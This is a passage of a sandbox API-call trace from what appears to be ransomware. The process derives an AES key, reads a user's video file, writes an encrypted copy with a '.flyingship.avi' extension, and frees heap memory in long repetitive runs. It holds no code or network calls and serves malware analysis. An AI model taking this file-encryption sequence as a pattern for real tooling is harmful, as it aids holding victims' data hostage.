lpMsg=0x87ee3c) returned 0 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0196.720] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0196.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0196.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0196.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0196.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0196.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.721] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.721] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0196.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.722] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.722] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.722] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.722] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0196.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.723] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0196.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.723] CryptDestroyHash (hHash=0x90af58) returned 1 [0196.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\rin_e.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.726] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.726] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0196.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\rin_e.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0196.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.732] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0196.732] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x5016, lpOverlapped=0x0) returned 1 [0196.736] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0196.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.736] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0196.737] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.737] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.737] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0196.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.737] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0196.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.737] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0196.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.737] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2708, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2708*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0196.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.737] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0196.737] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.738] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.738] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x5016, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x5020) returned 1 [0196.738] CharLowerBuffW (in: lpsz="byte[20513]", cchLength=0xb | out: lpsz="byte[20513]") returned 0xb [0196.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.739] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf4058*, pdwDataLen=0x87e820*=0x5016, dwBufLen=0x5020 | out: pbData=0xbf4058*, pdwDataLen=0x87e820*=0x5020) returned 1 [0196.739] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.739] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.739] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.743] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0196.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.744] CryptDestroyKey (hKey=0x90aed8) returned 1 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0196.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0196.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.745] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0196.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0196.746] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0196.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, 